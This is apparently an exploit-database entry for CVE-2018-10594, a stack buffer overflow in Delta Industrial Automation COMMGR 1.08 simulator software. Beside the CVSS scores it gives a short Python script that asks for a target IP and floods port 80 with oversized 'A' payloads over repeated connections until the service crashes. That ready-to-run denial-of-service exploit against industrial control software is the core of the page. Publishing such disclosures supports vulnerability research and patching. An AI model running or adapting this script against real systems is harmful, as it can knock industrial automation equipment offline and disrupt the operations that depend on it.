Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow

2018.07.02
Credit: t4rkd3vilz
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR - Remote STACK-BASED BUFFER OVERFLOW # Date: 02.07.2018 # Exploit Author: t4rkd3vilz # Vendor Homepage: http://www.deltaww.com/ # Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US # Version: COMMGR Version 1.08 and prior. DVPSimulator EH2, EH3, ES2, SE, SS2 AHSIM_5x0, AHSIM_5x1 # Tested on: Kali Linux # CVE : CVE-2018-10594 #Run exploit, result DOS import socket ip = raw_input("[+] IP to attack: ") sarr = [] i = 0 while True: try: sarr.append(socket.create_connection((ip,80))) print "[+] Connection %d" % i crash1 = "\x41"*4412 +"\X42"*1000 sarr[i].send(crash1+'\r\n') i+=1 except socket.error: print "[*] Server crashed " raw_input() break


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top